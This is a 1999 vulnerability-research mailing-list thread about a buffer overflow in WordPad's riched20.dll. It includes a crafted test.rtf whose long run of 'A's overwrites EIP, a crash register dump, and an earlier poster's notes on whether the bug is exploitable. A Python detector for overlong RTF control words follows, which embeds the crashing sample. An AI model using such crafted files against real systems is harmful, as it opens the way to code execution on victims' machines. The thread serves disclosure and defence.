Vulnerability Development mailing list archives
Re: WordPad/riched20.dll buffer overflow
From: gas-mail () INAME COM (Gas)
Date: Mon, 22 Nov 1999 16:37:36 -0300
I could reproduce EIP=41414141 with this file:

------------test.rtf-------------------
{\rtf1\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbcdeansi\ansicpg1252\deff0\deflang11274{\fonttbl
{\f0\fnil\fcharset0 Courier New;}}
\uc1\pard\ulnone\f0\fs20\par
}
------------end test.rtf---------------

And that's what I got:

----------------------------------------------------
WORDPAD provocó un error de página no válida en el módulo <desconocido> de 0000:41414141.
Registros:
EAX=00000102 CS=0177 EIP=41414141 EFLGS=00010206
EBX=0056e36c SS=017f ESP=0056e32c EBP=00002c0a
ECX=0056e36c DS=017f ESI=0056e36c FS=419f
EDX=fffffff3 ES=017f EDI=0056e420 GS=367e
Bytes en CS:EIP:
Volcado de pila:
,08x ,08x ,08x ,08x ,08x ,08x ,08x ,08x ,08x ,08x ,08x ,08x ,08x ,08x ,08x ,08x
----------------------------------------------------

--
Gas
gas-mail () iname com

----- Original Message -----
From: Gerardo Richarte <core.lists.bugtraq () CORE-SDI COM>
To: BUGTRAQ () SECURITYFOCUS COM <BUGTRAQ () SECURITYFOCUS COM>
Sent: Thursday, 18 November 1999, 06:45 p.m.
Subject: WordPad/riched20.dll buffer overflow
I've been trying to determine if it's exploitable, and couldn't reproduce what you described. I want to know if there is some other information I need to know... here is what I tried:
an rtf file with
{\rtf\AAAAAAAAA...} a lot of As (tried 32, 49, 1000, 2000, ... 5000 ... 20000)
Nothing happened until 5000, where I got a crash, but not with EIP==0x41414141; instead ESI==0x41414141 on a 'push [esi]'. ESI was copied previously from the stack, but on the stack there were only 4 As here, 8 As there, and so on... Then with 10000 As I got a different crash, with EDI==0x41414141, but I never got EIP==0x41414141.
Anyway, it MAY be exploitable, but doesn't look simple...
Then I tried a different approach: I got http://www.securityfocus.com, used a real rtf file and appended the same amount (32, 49, ...) of As after the first '\', but got exactly the same results...
Could anybody reproduce this bug?
richie
--
A390 1BBA 2C58 D679 5A71 - 86F9 404F 4B53 3944 C2D0
Research and Development - CoreLabs - Core SDI (Information Security)
http://www.core-sdi.com
--- For a personal reply use gera () core-sdi com
Attachment: test.rtf (application/msword)
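The crashing test.rtf above works by fusing a long run of letters into a single RTF control word. One defensive check that catches this class of malformed file, as an added example that is not code from the thread or from Core SDI: flag any control word longer than the 32 letters the RTF specification allows. The two sample documents are constructed here, the first modelled on the quoted test.rtf.

```python
import re

# RTF spec: a control word is a backslash followed by ASCII letters, at most
# 32 letters long, optionally followed by a signed decimal parameter.
MAX_CONTROL_WORD_LEN = 32
_CONTROL_WORD = re.compile(rb"\\([A-Za-z]+)(-?\d+)?")


def overlong_control_words(data: bytes, limit: int = MAX_CONTROL_WORD_LEN):
    """Return (offset, letters) for every control word whose letter run
    exceeds `limit`. Offset is the position of the leading backslash."""
    hits = []
    for m in _CONTROL_WORD.finditer(data):
        word = m.group(1)
        if len(word) > limit:
            hits.append((m.start(), word))
    return hits


def check_rtf(data: bytes):
    """Classify an RTF document; returns a list of findings (empty = clean)."""
    findings = []
    if not data.startswith(b"{\\rtf"):
        findings.append("missing {\\rtf header")
    for offset, word in overlong_control_words(data):
        findings.append(
            f"control word of {len(word)} letters at offset {offset} "
            f"(limit {MAX_CONTROL_WORD_LEN}): {word[:16].decode()}..."
        )
    return findings


# Constructed samples: the first mirrors the thread's test.rtf (a run of 'A's
# fused into what should be the \ansi control word), the second is benign.
CRASHING_RTF = (
    b"{\\rtf1\\" + b"A" * 40 + b"bcdeansi\\ansicpg1252\\deff0\\deflang11274"
    b"{\\fonttbl{\\f0\\fnil\\fcharset0 Courier New;}}"
    b"\\uc1\\pard\\ulnone\\f0\\fs20\\par }"
)
BENIGN_RTF = (
    b"{\\rtf1\\ansi\\ansicpg1252\\deff0\\deflang1033"
    b"{\\fonttbl{\\f0\\fnil\\fcharset0 Courier New;}}"
    b"\\uc1\\pard\\f0\\fs20 Hello\\par }"
)

if __name__ == "__main__":
    for name, sample in (("crashing", CRASHING_RTF), ("benign", BENIGN_RTF)):
        print(name, check_rtf(sample) or ["clean"])
```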